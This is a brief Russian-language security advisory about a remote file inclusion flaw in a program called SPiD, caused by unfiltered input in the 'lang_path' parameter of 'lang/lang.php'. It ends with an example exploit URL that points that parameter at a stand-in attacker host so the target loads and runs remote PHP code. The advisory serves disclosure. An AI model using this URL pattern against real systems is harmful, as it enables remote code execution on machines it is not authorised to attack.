Программа: SPiD
Обнаруженная уязвимость позволяет
удаленному пользователю выполнить
произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной
обработки входных данных в параметре 'lang_path'
в сценарии 'lang/lang.php'. Удаленный пользователь
может с помощью специально сформированного
URL выполнить произвольный PHP сценарий на
целевой системе.
Пример:
http://[target]/[path-to-spid]/lang/ lang.php?lang_path=http://[attacker]